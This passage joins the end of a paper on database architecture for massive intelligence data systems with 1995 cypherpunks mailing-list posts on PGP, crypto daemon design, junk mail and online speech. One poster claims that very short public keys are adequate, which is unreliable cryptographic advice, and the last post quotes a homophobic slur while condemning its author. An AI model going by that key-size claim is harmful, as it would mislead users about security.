maintain index files and provide associative access to the secondary storage.
The limits of these models within the context of massive databases need to be
understood.  New or modified approaches may be required.

	DBMS Functions:  The techniques to implement the DBMS functions have to be
modified to handle massive databases.  For example, as the size of the database
increases, new approaches for  query optimization, concurrency control,
recovery, and backup, access methods and indexing, and metadata management will
be required.  

The architectural, data modeling, and functional issues that need to be
addressed for MDDS will be elaborated in sections 3 and 4. 

3.0  ARCHITECTURAL AND DATA MODELING ISSUES
3.1  Architectural Issues
This section describes some of the architectural issues that need to be
addressed for an MDDS. In the case of the centralized approach, a major issue is
managing the data transfer between the main memory and secondary storage. One
could expect the data that is a week old to be cached in main memory, the data
that is less than two months old to be in secondary memory, and data that is a
few years old to be in tertiary storage. In designing the data management
techniques (such as those for querying, updating, and transaction processing),
data transfer between the main and secondary memories needs to be minimized.
There is also a need to reflect patterns of use (e.g., in migrating items to
lower/higher levels of storage hierarchy). Another issue is the relationship
between the size of the cache and the size of the database. 

When one migrates to distributed and parallel architectures, a goal is to
maintain a larger number of smaller databases. It is assumed that processors and
storage devices are available. A  major issue is the communication between the
processors. In designing the data management mechanisms, an objective would be
to minimize the communication between the different processors. For example, in
the case of a join operation between several relations in a relational DBMS,
each fragmented across multiple sites, an issue is whether to merge all of the
fragments of a relation and then perform the join operation or whether to do
several join operations between the fragments and then merge the results to form
the final result. Different configurations of the distributed and parallel
architectures also need to be examined. For example, there could be
point-to-point communication between every processor, or the processors could be
arranged in clusters and communication between clusters is carried out by
designated processors. Another issue in migrating to a distributed architecture
is handling data distribution. For example, if the data model is relational,
then how could one fragment the various relations across the different sites? 
If the relations are to be replicated for availability, then how could
consistency of the replicated copies be maintained?  Another issue is what data
could be cached within the distributed system, how could data be cached, and for
how long could the cache be maintained. 
   
While distributed and parallel architectures are being investigated for managing
massive databases, federated architectures are needed to integrate the existing
different and disparate databases.  The existing databases could be massive
centralized databases or they could be distributed databases. Furthermore, they
could be relational, object-oriented and even legacy systems.  An issue in
heterogeneous database integration is developing standard uniform interfaces
which can be accessed via an integration backplane.  If the environment is a
federated one, where the nodes have some autonomy, then a major issue is the
ability to share each other's data while maintaining the autonomy of the
individual DBMSs. This is hard because cooperation and autonomy are conflicting
goals.  The techniques to implement the DBMS functions for data retrieval,
updates, and maintaining integrity have to be adapted or new approaches have to
be developed for federated architectures.  

Extensible architectures are also being investigated for massive databases. 
With such architectures, DBMSs are extended with inferencing modules which make
deductions from data already in the database.  This way, one need not store all
of the data in the database explicitly. Instead, appropriate inference rules are
used to make deductions and derive new data.  This way the size of the database
is reduced.  The issues include determining what data is to be stored in the
database and what data is to be stored in the knowledge base manipulated by the
inferencing module, effective management of the knowledge base, and adapting the
functions of the DBMS to handle extensible architectures.  
   
3.2  Data Modeling Issues

In selecting an appropriate data model for massive databases, several issues
must be considered. Providing a data model powerful enough to support the
representation of complex data must be addressed.  For example, with a
multimedia document, one may need to devise a scheme to represent the entire
document in such a way to facilitate browsing and updating. Since the age of a
document could be used to move it between different storage media, it is
desirable for the data model to support the representation of temporal
constructs. The representation of different types of multimedia devices and
grouping of documents are also important considerations in selecting a data
model. The data model chosen has an impact on the techniques to implement the
functions of a DBMS. For example, DBMSs based on some models use associative
access while those based on some other models use pointer traversal. 

In migrating to a distributed/parallel architecture, if it is assumed that the
data model is the same for all databases, then a major issue is whether it is
feasible to provide a conceptual view of the entire massive database to the
user. However, in the case of a federated architecture, since it is generally
assumed that the individual data models are different, several additional issues
need to be considered. For example, could the users have a global view of the
massive database or could they have their own individual views?  In either case,
it would be desirable for the users to access the distributed databases in a
transparent manner. If a global view is enforced, the query processor could
transform the queries on the global view to the views of the individual
databases. If each user has his own view, then the query processor could
transform the users view into the views of the individual databases. Other
issues for a federated architecture include the representation of the individual
schemas (which describe the data in the databases), determining which schemas to
be exported to the federation, filtering appropriate information from the
schemas at different echelons, integrating the schemas to provide a global view,
and generating the external schemas for the users. In integrating the different
schemas, the semantic and syntactic inconsistencies between the different
representations need to be resolved. For example, the address in database A
could include the house number and the street name while in database B it could
just be the city and the state. 

4.0  FUNCTIONAL ISSUES   
The techniques to implement the functions of MDDS will be impacted by the
architectures and data models as well as requirements such as integrity and
multimedia data processing. Therefore some of the functional issues have already
been addressed in section 3. This section provides a more detailed overview of
the functional issues.  First the basic functional issues for MDDS (such as
issues on query processing and transaction management) will be discussed and
then the impact of maintaining integrity, realtime processing, and multimedia
data processing will be given. 

4.1 Querying, Browsing, and Filtering
The query operation is a means by which users can retrieve data from the
database. Closely related is the browsing operation where users traverse various
links and subsequently scan multiple documents either sequentially or
concurrently. To determine if the new information warrants viewing by the
analyst and/or to enforce access control, automatic filtering of the data is
needed. Some issues in query management for massive databases are using an
appropriate language for specifying queries and developing optimization
techniques for the various operations involved in a query. The goals are to make
it easier for users to formulate queries and also to minimize data transfer
between primary and secondary storage. 

Query management in a federated environment must provide the means for
formulating and processing queries seamlessly and efficiently. This involves
designing an interface for formulating queries over multiple sources. There is a
need for query optimization, in order to prevent degradation in performance in
the distributed system. In addition to determining the execution strategy for a
query, query optimization techniques could also determine which portion of the
query processing is to remain under direct and unshared control at the analyst's
workstation. Methods need to be developed for browsing the integrated
information space and for displaying results obtained from multiple sources.
Finally, data from local databases have to be filtered according to the various
constraints (such as security constraints) and enforced before sending it to the
remote sites. 

Query processing algorithms in an extensible architecture need to incorporate
inferencing techniques.  The usefulness of inferencing techniques for
intelligence applications can best be illustrated with a simple example. Suppose
parts A, B, C and D are needed to build a nuclear weapon, and also suppose that
the following constraint is enforced:  " if three of the four parts are shipped
to country X, then the fourth part should not be shipped to X."   Therefore, if
parts A, B, and C are already shipped to X and there is a request from X for
part D, then the inferencing module will determine that this part cannot be
shipped.  An issue in developing an inference module is determining the
deduction strategies to be implemented. These strategies could be just logical
deduction or could include more sophisticated techniques such as reasoning under
uncertainty and inductive inference. With most inference strategies one runs
into the problem of an infinite loop; therefore appropriate time limits must be
enforced to control the computation.

In general, the issues to be addressed in query management will include:

	Query optimization.
	Handling data distribution
	Making intelligent deductions 
	Uniform vs. user-tailored query language 

4.2  Update Transaction Processing
Multi-user updates are supported in general to improve performance. The goal is
for multiple users to be able to update the database concurrently. A major issue
here is ensuring that the consistency of the database is maintained. The
techniques that ensure consistency are concurrency control techniques. Often
update requests are issued as part of transactions. A transaction is a program
unit that must be executed in its entirety or not executed at all. Therefore, if
the transaction aborts due to some error, such as system failure, then the
database is recovered to a consistent state.

Several concurrency control algorithms have been designed and developed for
different environments. Some algorithms are suitable for short transactions in
business processing applications and some others are suitable for long
transactions which often involve multimedia data. To handle long transactions
efficiently, weaker forms of consistency conditions have been formulated.
Several recovery techniques have also been developed to maintain the consistency
of the database. If the transaction is long, then the log files that record the
actions of the transaction may be quite large. Efficient management of log files
becomes an issue. As the size of the database increases, a transaction would
take a longer time for execution. Adapting the concurrency control and recovery
algorithms or developing new algorithms to work with the massive databases
becomes an issue.  

Update transaction processing gets more complicated in distributed and federated
environments. For example, if replicated copies are to be maintained, then
making them consistent will have an impact on the performance. Therefore, an
issue here is whether to maintain strict consistency or select a subset of the
copies and make them consistent immediately so that the remaining copies could
be updated at a later time. One of the problems with a federated environment is
the different concurrency control and recovery algorithms used by the individual
DBMSs. In such a situation synchronizing the different techniques becomes a
major issue. 

4.3  Access Methods and Index Strategies
To enhance the performance of query and update algorithms, efficient access
methods and index strategies have to be enforced. That is, in generating
strategies for executing query and update requests, the access methods and index
strategies that are used need to be taken into consideration. The access methods
used to access the database would depend on the indexing methods. Therefore
creating and maintaining appropriate index files is a major issue in a DBMS.
Usually, the size of the index file grows with the size of the database. In some
cases, the index file could be larger than the database itself. Some of the
issues include determining what type of indexes are to be maintained for massive
databases.  Is it feasible to have dense indexing where there is an entry in the
index file for every entry in the database?  If so, the index file could have as
many entries as there are in the database. Is it better to have sparse indexing
so that the size of the index file could be reduced?  If so, is there a strategy
to determine which entries in the database are to be indexed?  For multimedia
data, indexing could be done not only by content but by type, language, context
(i.e., where, how, when it was collected), author (i.e., for documents), and
speaker (i.e., for voice). The challenge is how to index and to provide improved
mechanisms for extraction of the information used for indexing.   For example,
the ability to automatically index voice is desired.  Additionally, the ability
to index voice and video (with associated voice) with their transcriptions
(i.e., time alignment) is necessary.

Various storage structures have been proposed. These include B-Trees and
Parent-Child links. The question is, are these methods suitable for massive
databases? Voice and video data require segmentation into logical units for
storage and access. Additionally, the ability for automatic segmentation within
documents of embedded drawings and figures and their interpretation (via
seamless integration with image handling tools) is needed. Other challenges
include providing user transparent hierarchical storage management (i.e., store
the most relevant or most recent information on the fastest media) and the
ability to reposition data in the storage hierarchy based upon changing
importance, migration mechanisms for transferring information to newer storage
media or a new architecture (failure to do so can lead to exorbitant costs to
maintain discontinued storage media drives or inaccessible data), archival
technology/policies for older/less important information, and synchronization of
information distributed across multiple repositories

Compression can decrease the costs of storage and transmission especially for
the larger objects such as vector and raster spatial data types, voice, imagery,
and video. Real-time conversion of heterogeneous voice and video compression and
file formats in network broadcasts/multicasts is an issue.  For imagery, a
capability such as pyramidal decomposition for providing reduced resolution
images is needed for browsing purposes.

4.4  Managing the Metadata
The metadata includes a description of the data in the database (also referred
to as the schemas), the index strategies and access methods used, the integrity
mechanisms enforced, and other information for administrative purposes. 
Metadata management functions include representing, querying, and updating, the
metadata.  In massive databases, if the metadatabase is much smaller than the
database, then the traditional techniques could be applied to manage the
metadata. If the metadatabase becomes massive, then new techniques need to be
developed. An issue here is whether the techniques for massive databases could
be applied for massive metadatabases also. Support for schema evolution is
desired in many new generation applications.  For example, the structures of the
entities in the database could change with time.  An entity could acquire new
attributes or existing attributes could be deleted. The metadata needs to be
represented in a manner that would facilitate schema evolution. That is,
appropriate models to represent the metadata are desired. Since the metadata has
to be accessed for all of the functions of a DBMS, the module that is
responsible for accessing the metadata needs to communicate with all the other
modules. Efficient implementation of this module is necessary to avoid
performance bottlenecks. 

Certain types of metadata, such as the schemas, are usually accessible to the
external users.  An issue here is whether to provide a view to the users that is
different from the system's view of the metadata.  For example, a different
representation of the metadata could be sued for the users.  Also, if the
metadatabase is massive, then subsets of it could be presented to the users.    

4.5  Integrity
Concurrency control and recovery issues discussed in section 4.3 are some of the
issues that need to be dealt with in order to maintain the integrity  (i.e.
consistency) of the database. Other types of integrity include maintaining the
referential integrity of entities and enforcing application dependent integrity
constraints. Referential integrity mechanisms must ensure that the entities
referenced exist. The question is, how could the references to an entity be
deleted when an entity itself is deleted?  If the databases are massive, then
there will probably be more references to the deleted entity. Deleting all these
references in a timely manner is an issue.

In the case of application specific integrity constraints, they could trigger a
series of updates when one or more items in the database gets updated. Again, as
the size of the database increases, the number of updates that are triggered
could also increase. The issue here is ensuring that the updates are carried out
in a timely manner. 	

4.6  Realtime / Near Realtime Processing
Within a massive digital data system, the challenges of realtime or near
realtime processing will be compounded.  For realtime or near realtime
applications, timing constraints may be enforced on the transactions and/or the
queries. In the case of a hard realtime environment, meeting the timing
constraints may cause the integrity of the data to suffer. In the case of soft
realtime constraints (also referred to as near real-time), there is greater
flexibility in meeting the deadlines. The issues for real-time processing
include:

 	If a transaction misses its deadline, then what are the actions that could be
taken?   
	Could a value function be associated with a transaction which can be used to
determine whether the transaction should continue after it misses its deadline?
	Could the transaction be aborted if the value of the data approaches zero?  
	What is the impact on the scheduling algorithms when timing constraints are
present?  
	How can the techniques be extended for a distributed/federated architecture? 
	In the case of realtime updates in a distributed replicated environment, is it
possible to maintain the consistency of the replicated copies and still meet the
timing constraints?  
	What is the impact on the techniques for multimedia data processing?
4.7  Multimedia Data Processing
By nature, multimedia data management has to deal with many of the requirements
for indexing, browsing, retrieving, and updating of the individual media types. 
Implementing multimedia data types will require new paradigms for representing,
storing, processing, accessing, manipulating, visualizing, and displaying data
from various sources in different media. One of the major issues here is
synchronizing the display of different media types such as voice and video. 
Other issues include selecting/developing appropriate data models for
representing the multimedia data and developing appropriate indexing techniques
such as maintaining indexes on textual, voice, and video patterns.  For example,
the ability to index voice and video simultaneously may be desired.  

In addition to the manipulation of multimedia data, frameworks for the
integration of multimedia objects as well as handling different granularity of
multimedia objects (i.e., 1 hour video clip versus a spreadsheet cell) need to
be considered. A flexible environment has to be provided so that the linked and
embedded distributed multimedia objects can accommodate geographic/network
changes.  Finally, the data manipulation techniques as well as the frameworks
need to be extensible to support new and diverse data types.  

4.8  Backup and Recovery
On-line backup procedures are being used for massive databases. This is because
off-line procedures will consume too much time for massive databases. Even if
the backup procedures are carried out on-line, the system could be slowed down
and therefore the performance of other data management functions would suffer.
The issue here is to develop improved techniques for backup so that it will not
impact functions such as querying, browsing, and updating. 

Recovery issues for transaction management were discussed in section 4.3. Other
recovery issues include whether to maintain multiple copies of the database, and
if so, the number of copies to be maintained, and whether the checkpointing,
roll-back and recovery procedures proposed for traditional databases could be
used for massive databases or is there a need to develop special mechanisms?

5.0  SUMMARY

Massive digital data systems will require effective management, retrieval, and
integration of databases which are possibly heterogeneous in nature. Achieving
this concept of massive intelligence information systems will require new
technologies and novel approaches for data management. While hardware is rapidly
advancing to provide massive data storage, processing, and transmission, the
software necessary for the retrieval, integration, and management of data
remains an enormous challenge.

This paper has identified a set of issues for managing the data in massive
digital data systems with a focus on intelligence applications. First, an
overview of the current approaches to data management and the scalability of the
current approaches were discussed  Then some architectural and data modeling
issues were given. Finally, a discussion of the issues for the various functions
of MDDS were given. The set of issues identified is by no means considered a
complete list. As the progression of research, prototyping, and deployments
continue, new or hidden challenges will arise. 






From x93ojg at juliet.stfx.ca  Thu Nov 23 07:01:49 1995
From: x93ojg at juliet.stfx.ca (Still)
Date: Thu, 23 Nov 95 07:01:49 PST
Subject: PGP in Canada
In-Reply-To: <Pine.OSF.3.91.951123073901.6893B-100000@nic.wat.hookup.net>
Message-ID: <Pine.A32.3.91.951123110336.108308A-100000@juliet.stfx.ca>


On Thu, 23 Nov 1995, Tim Philp wrote:

> You can try to get PGP from the MIT site but it may not allow you to do 
> so if it does not recognize your address as being Canadian. I tried to 
> get PGP-Phone and it told me that it did not think that I was a Canadian. 
> I wrote to the administrator but have never received a reply. I checked 
> about a week ago and I still could not get the file.
> Tim Philp
> 
I already downloaded a copy last week but I deleted it because I didn't 
knwo if it ws legal to use it and my Sys admin would probable revoke my 
account if it was illegal.  I was talking to him and he told me that if I 
can prove that it is legal he will let me use it.
 

--

	     T H E  M A N , T H E  M Y T H , T H E  L E G E N D . 
******************************************************************************
* Dylan "Still" Boudreau	* Knowledge is proud that she knows so much; *
* Internet: x93ojg at stfx.ca	* Wisdom is humble that she knows no more.   *
******************************************************************************
*       Homepage: http://juliet.stfx.ca/people/stu/x93ojg/welcome.html       *  
******************************************************************************

		When someone says, "That's a good question." 
		 You can be sure it's a lot better than the 
		         answer you're going to get.







From attila at primenet.com  Wed Nov 22 15:44:08 1995
From: attila at primenet.com (attila)
Date: Thu, 23 Nov 1995 07:44:08 +0800
Subject: Design proposal: crypto-capable generic interface
In-Reply-To: <Pine.SUN.3.91.951122094209.29001A-100000@infinity.c2.org>
Message-ID: <Pine.BSD.3.91.951122214304.21297A-100000@usr1.primenet.com>


On Wed, 22 Nov 1995, Raph Levien wrote:

> On Wed, 22 Nov 1995, Carl Ellison wrote:
> 
> > >Date: Sat, 18 Nov 1995 00:42:21 -0800 (PST)
> > >From: Raph Levien <raph at c2.org>
> >
> > >   I propose that the new interface lives as a sort of daemon, rather
> > >than a static collection of command line script pieces. 
> > 
> > Danger, Will Robinson!  (see below)
> 
  attila->
    the daemon, in and off itself, is not dangerous -it becomes critical
if it is accessible via the port number tables. the problem with a user
invoked slave process via a socket mechanism is the same as with a .dll or
likable library: the application need to determine the authenticty of the
single application socket" 

    the system wide multi-process daemon has an advantage in one respect: it
can only be loaded by the administrator, and as long as each invocation 
declares (and wipes at exit) its one memory allocation, including any 
pseudo-static variables --keep in mind that it must not be tied to the 
external tables.  Therefore, in order to not be passing keys, passphrase, 
and all that good stuff across a lan, the daemon must be able to verify 
that the caller is literally local.  This works even on diskless 
workstations as long as they have sufficient memory to support the 
application and the processes are specified non-swappable.
 <-attila

>    In restrospect, "daemon" was a poor choice of words to describe my
> proposal. "Slave process" gets the idea across much better, but may be a
> bit less PC. A daemon sits on a publicly accessible port, such as a TCP/IP
> socket. The slave process is only accessible to the user who invoked it
> (enforced by the OS's file permissions). Further, it only gives secrets to
> individual processes that authenticated themselves first (by sending a
> passphrase down the connection to the slave process). 
> 
> > >   Once the negotation has been established, the application can send
> > >the daemon MIME objects that the app does not understand but the
> > >daemon does (for example, an image/fractal). The daemon can return a
> > >MIME object that the app does understand (for example, an image/ppm).
> > 
> > This part sounds good...a sort of master translation service.
> 
>    I'm glad you like it!
>
    <attila> the temptation here is to use plugins to reduce the load
component.  Again, you have the problem of tampered linkable libraries or
.dlls.  Secondly, the problem with diskless workstations rears up, again
--the diskless workstations must obtain their loadable modules from the
LAN/WAN unless RAM is infinite and everything is preloaded --except, hear
comes the LAN/WAN again before load. 

    of course, both the basic daemon and all the loadable plugins can an
also be encrypted with the header containing at least lateral and linear 
checksums, if not polynomial check subroutines for authentication. in both 
cases, the base daemon must verify the authenticity which means it needs 
a system manager modifiable list table.

    the use of public/private key pairs which can me modified for each
sight by a system manager with either a special routine or a debugger,
provides an additional level of security. 

    although you could enable a similar service between the daemon and 
the calling module using DH for each "session," thereby making it even 
harder for an interloper to monitor any IPC connections, even if LAN/WAN 
usage was permitted under these conditions --just how far do you want or 
need to push the limits of "secure."  I'll answer that the usual way for 
anyone who has written code, let alone secure code or crypto --to the max 
--better snooping tools are alway around the corner (it's just like the 
arms race).  --and, there is always the wrapper approach on top of this.
 <attila>
 
> > >   Alternatively, the daemon may request an authentication. This is
> > >useful when resolving external bodies that require authentication,
> > >including non-anonymous FTP, and standard authenticated HTTP. In this
> > >case, the daemon sends a message to the app requesting the
> > >authentication. It specifies whether it needs both username and
> > >password, or just password. In the latter case, it hands a username to
> > >the application.
> > >   The application can then query the user for the authentication
> > >data. It hands this back to the daemon. In reply, the daemon indicates
> > >success or failure. In case of success, it hands the object back to
> > >the app.
> > 
> > Now I get worried.  This communication with the demon is via some IPC --
> > maybe even via a LAN.  Some things can't be distributed safely and
> > authentication is #2 on my list.
> 
>    No, the communication is not via a LAN. On a Unix system, the 
> communication is through Domain Sockets. Both processes live on the same 
> machine, and the socket "lives" on the local file system.
>
    <attila> No, that is not is not always true; again, user space
sockets present the same security risk as loadable modules unless you have
a base socket which decrypts and authenticates each loadable module. And, 
user sockets are more easily attacked.
 <attila>
 
>    I submit that my proposal is every bit as secure as, say, PGP is now. 
> If you can't trust the operating system not to hand domain sockets from 
> one process to another, then you certainly can't trust it to, for 
> example, substitute different binaries for the crypto program (an attack 
> which Ian et al cleverly mounted a few weeks ago).
>    If it were not the case that my proposal was as secure as PGP, then I 
> would want to withdraw it. However, the proposal has so many advantages 
> that I would want to see a serious description of the attack, rather than 
> just feelings of endangerment to Will Robinson.
> 
> > >   Encryption is a bit more tricky, but in essence you just hang a
> > >premail-alike off this kind of protocol. The hard part is specifying
> > >the key, but you just call it a "parameter" and put in hooks for the
> > >daemon to ask for whatever parameters it needs. 
> > 
> > Crypto keys are #1 on my list of things you can't distribute (unless they
> > are wrapped, of course).
> 
>    I should have made it cleaer that I am referring to public keys. If 
> public keys are on the list of things that can't be distributed, then I 
> believe we are in trouble.
>
    <attila> in order for a "user" to decrypt public key paired messages,
the users private key must be passed to the daemon --obviously in a secure
packet which again can be initiated with DH; the alternative is a lookup
from a standardized location such as ~/.private/ring which can be
non-readable except by the owner or by the daemon running suid as the user
at the authentication level. 

    Personally, I would rather pass the private key from the user module
intereface in an authentication packet and not have it necessarily visible
--the same goes for the pass phrase. 
    
    this checking and rechecking may be necessary for maximum security on 
a multi-user machine, but you may have more authentication overhead than 
translation overhead in a short packet...

    and, what do you do with MickeySoft?  with as much 3.1 base code as 
there appears to be from the complaints, W95 looks like a problem for 
multi-process packetizing, etc. Maybe NT is better?  I do not use either 
and will stay with some form of BSD (Solaris and FreeBSD currently). I 
may be the last holdout on earth as the posting yesterday detailed, but I 
will be a holdout.
  <attila>
 
> > >						 This requires that
> > >keys have some nonforgeable names, which is unfortunately not a
> > >feature of PGP 2.6.2. S/MIME will do it just fine, if you buy into the
> > >Certifcation Authority (<wink> at Nick Szabo).
> > 
> > Public keys, if that's what you're talking about, have perfectly good
> > nonforgeable names -- themselves.  They are unique.  They are the proper
> > name which can collect all the attributes of that key which are of interest
> > (e.g., permission to spend $, name of a human who knows the private key,
> > attributes about that human, etc.).
> 
>    Ok. But public keys have one serious disadvantage: their size. I can't 
> put a public key on my business card or read it over the phone. I want a 
> unforgeable key name. I want this to be the standard key name in the 
> interface between the application and the crypto engine. I want users to 
> be able to specify them directly, at the very least to bootstrap the 
> public key infrastructure.
>    I propose using the MD5 hash of the whitespace-free MOSS 
> representation of the public key, in hex. It's simple enough to be 
> described in one sentence, but does everything I want.
>
    <attila> there is nothing that says you can not use a 64 or 128 bit
public key; nothing says you must use 1024 bits for the public. the fact
the private key is 1024 bits is irrelevant other than the fact it
increases security. there are some advantages of simplicity for
simplicity's sake! :)
  <attila>
 
>    Note that PGP 2.6.2 does _not_ allow the use of a public key as the 
> name of a public key, unless you do a horrible hack such as replace the 
> pubring.pgp file with the one public key of interest. This is a 
> significant problem when trying to identify which key signed a signed 
> message. I haven't bashed around with TISMOSS enough, but I'm not sure it 
> will allow this either. I got the impression that it preferred the use of 
> an alias.
> 
> > >   One final aside: I've been fairly frustrated with this mailing list
> > >as a forum for talking about real design proposals and implementation
> > >issues. Ignorant posts by the likes of Dr. Fred and Alice d'Clueless
> > >tend to attract far more attention than real crypto work. I want a
> > >forum for, and just for, cypherpunks who write code. If I had just a
> > >smidgen more free time (as if), I'd be trying to start one
> > >myself. Anyone else?
> >
    <attila> for a man with a piled higher and deeper, Dr. Fred's spelling
and grammer skills are quite poor, maybe 8th grade.  we dont need to deal
with the pompous holier than thou attitude from anyone.
    I too have a piled higher and deeper in information techniques (which
includes security). what's it worth?  Not much if you can not support it
with your actions and accomplishments. 
    ...just open your mouth Dr. Fred so we can check your IQ (Ignorance
Quotient!). 
  <attila>

> > I've seen this happen several times.  As a list gets popular, it
> > diversifies.  You might try sci.crypt.research -- since it's moderated.
> 
>    Thanks for the suggestion. However, my concerns are with 
> implementation and deployment, not research.  I am perfectly willing to 
> consider cryptographic algorithms to be black boxes that do what they say 
> they will. I think the charter exists to start a new list. John Gilmore 
> has already offered to start a "coderpunks" list on toad.com. Shall we 
> take him up on it?
> 
> Raph
> 
    <attila> The problem with a new list is that we really need a
moderated list;  the condition being that all messages dealing with code
pass if you are a member, but no one should be discriminated agains
membership --no politics, not even the alerts which we really should be
aware of as public "policy" (if you can call it that) does concern how we
approach crypto in general. sci.crypt.research is a little more techinical
that it needs to be and rarely has the give and take we have in this list
--particularly when we are kicking around a proposal (like the universal 
translator of this thread.
    I would suggest that the code arguments be cross posted to the 
current list.  we might find some interesting political considerations 
may lead to proposals for code.
    The problem is the the moderator --who has the time? If not John 
Gilmore, maybe TCM??? 
    I have more or less retired from active consulting and would do it if
I were not overcommitted including some travel for the next several months
--I do have a fast notebook, but toll charges are a bitch.  It is
important that there is "moderation" which blows away ideas despite
personal bias and preference. 
    One possible way to set the moderated list is to post as we always 
have to cypherpunks, and the moderator pops all the code related postings 
over to cypherpunks.moderated at toad.com (or whereever). This means the 
main list is complete, with the moderated list code limited. Once a 
message thread is identified, procmail would pick up the thread and 
forward it. .procmailrc commands could be handled automatically with a 
small script.
    Currently, after procmail breaks incoming into lists, I sort
cypherpunks by subject and "pre-delete" all the noise discussions (other
than a few like tcm or gilmore or perry, etc.). I could get nasty with a
more aggresive procmail (mine only splits incoming into separate lists and
wipes out Dr. Fred before it even gets to any list). 
    Do a few of us wish to hash this problem out in email?  Maybe we 
could swap the responsibility around when someone is out of town. Count 
me in, I'm all in favour of a moderated list with a reasonably controlled 
membership, not just a listproc or majordome open subscribe function.

  <attila>
 








From anonymous-remailer at shell.portal.com  Wed Nov 22 15:58:12 1995
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Thu, 23 Nov 1995 07:58:12 +0800
Subject: Junk E-Mail
Message-ID: <199511220939.BAA22898@jobe.shell.portal.com>


On Wed, 22 Nov 1995, James M. Cobb wrote:


> 11 21 95 The Electronic Telegraph reports: 
>  
>    THE European Parliament will decide today whether to 
>    ban junk mail. 

This is not surprising coming from the Europeans.  They tend to 
favour environmental conservation.

I beleive that Germany mandates, as an example, that a manufacturing
company accept a return of its product for recycling at the cost of
the manufacturer.

Could you see GM or Ford actively supporting that type of program to
deal with the trash problem??



Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.






From jcobb at ahcbsd1.ovnet.com  Wed Nov 22 16:02:40 1995
From: jcobb at ahcbsd1.ovnet.com (James M. Cobb)
Date: Thu, 23 Nov 1995 08:02:40 +0800
Subject: Junk E-Mail - Part 3
Message-ID: <Pine.BSD.3.91.951122041306.28519H-100000@ahcbsd1.ovnet.com>


 
 
Friend, 
 
 
An 11 21 95 Reuter Information Service newsstory, headed 
 
      Computer illiterates offered new way onto Internet 
 
[OR: Junk mail wants to meet computer illiterate for safe sale] 
 
reports: 
 
   Matsushita Electric Industrial Co said on Tuesday it had 
   developed a way of accessing the Internet using the fam- 
   iliar telephone and fax machine.... 
 
   With the Matsushita system, users can obtain an index 
   via a facsimile machine and choose Internet subjects 
   they are interested in by keying in numbers on their tele- 
   phones.... 
 
   The telephone and fax are connected to server comput- 
   ers.... 
 
   Information coming back arrives as ordinary sound over 
   the telephone handset or as printed text off the facsimile. 
 
 
AT&T was offering an index of newsstories in a series of 
ads in the Wall Street Journal a couple of years ago.  You 
faxed the code numbers of the stories you wanted to read 
to AT&T; and AT&T faxed back the stories. 
 
                   FIRST RULE OF JUNK MAIL 
 
If you can sell it to the elite, you can sell it to the masses. 
 
 
Cordially, 
 
Jim 
 
 
 
NOTE.  The NandO News website URL is: 
 
       http://www.nando.net 
 
       The newsstory's dateline: 
 
       TOKYO (Nov 21, 1995 - 08:18 EST) 
 
       Its online filename: 
 
       info735_8.html 






From jcobb at ahcbsd1.ovnet.com  Wed Nov 22 16:05:27 1995
From: jcobb at ahcbsd1.ovnet.com (James M. Cobb)
Date: Thu, 23 Nov 1995 08:05:27 +0800
Subject: Secrets of the Internet
Message-ID: <Pine.BSD.3.91.951122041435.28519I-100000@ahcbsd1.ovnet.com>


 
 
Friend, 
 
 
11 21 95 Times of London screams that 
 
           Pedophiles use encoding devices to make 
                  secret use of Internet 
 
 
Its newsstory reports an 
 
                   Interpol conference 
 
was told that 
 
               International pedophile rings 
 
are borrowing 
 
                   an encryption system 
 
           known as PGP -- Pretty Good Privacy -- 
 
             developed in [where else!] America 
 
and 
 
   Experts estimate that it could take 10 years for computer 
   systems to crack the individual codes. 
 
 
If that's not enough to reduce you to jelly, 
 
   Police [are] also concerned at the use of a "remailing" 
   service being provided by an Internet expert in Finland 
   who will take material sent to him and remove identifica- 
   tion marks before sending it out again. 
 
 
On Monday, at the start of the two-day conference in Lon- 
don on crime against children, Detective Chief Inspector 
Bryan Drew of the UK's National National Criminal Intelli- 
gence Service said  
 
   ...although police increasingly realised the difficulties 
   posed by the Internet...as yet no one in Britain had de- 
   cided on a policy for dealing with them. 
 
and 
 
   ...the Internet and computers were among a number [of] 
   subjects being looked at by his unit.
 
 
Interim measures for "dealing with" computers and the 'Net 
abound: 
 
   As part of the Interpol work, a network of 64 liaison offi- 
   cers had been set up round the world to keep contact on 
   investigations. 
 
 
And when the State ("no one") DECIDES...? 
 
 
Cordially, 
 
Jim 
 
 
 
 
NOTE.  The NandO News website URL is: 
 
       http;//www.nando.net 
 
       The newsstory's dateline is: 
 
       LONDON (Nov 21, 1995 - 01:24 EST) 
 
       Its online filename is: 
 
       info429_4.html 






From dlv at bwalk.dm.com  Wed Nov 22 16:09:34 1995
From: dlv at bwalk.dm.com (Dr. Dimitri Vulis)
Date: Thu, 23 Nov 1995 08:09:34 +0800
Subject: Java & Netscape security [NOISE]
In-Reply-To: <9511220545.AA01344@zorch.w3.org>
Message-ID: <g0myeD2w165w@bwalk.dm.com>


hallam at w3.org writes:
> One point to be made is that at Universities we all have university accounts
> because people realise that there is no connection between our views and
> institute policy. The freedom to hold unpopular views being part of what
> universities are all about. On the other hand there is no such assuption
> concerning posts from foo.com.

People who realize this, and use a University account to make "politically
incorrect" statements, may be in for a rude surprise. Examples are posted way
too frequently to alt.censorship.

> On Phil Stromer, I don't think the Internet posts were the only point at issu
> He was very offensive however, it was not merely the views he posted but the
> manner in which he made them that caused offense. He also made a lot of
> assertions concerning other posters which might have led to legal action
> against Sun.

It was definitely dumb of Stromer to have posted from a Sun account. However
I'm sure that if he had posted from something like Netcom, and if he were known
to work for Sun, some guardians of political correctness would have complained
to Sun anyway. When I was in grad school, people used to complain to the grad
school about my politically incorrect writings coming from this BBS, which is
not affiliated with the school in any way (some of them were even forged :).

Since I've bothered digging up the following quote, I might as well post it:
============================================================================
Philip H. Stromer:
Contrib. post:
 He was another hate-filled bigot who posted rants about homosexuality.
He became obsessed with the idea that anal sex would wear out the
muscles of the digestive tract, causing incontinence; he also posted
long gloating messages about "AIDS-infested faggots".
 Eventually, Sun Microsystems fired him for breach of contract, for
posting messages which were intimidating and harassing to other
employees.  He sued them, and lost.  Appeared again from some
commercial site or other, but soon sunk out of view.
 A salutory lesson to those who believe that the Internet is a license
to spew bigotry.
--
 Oh yeah. I've read this clown's rantings from time to time, and the one
thing that occurs to me is that he and little Danny Karnes may be the same
person. This isn't a _claim_ that they are, mind you, but you'd hardly
know any better from their posts.
--
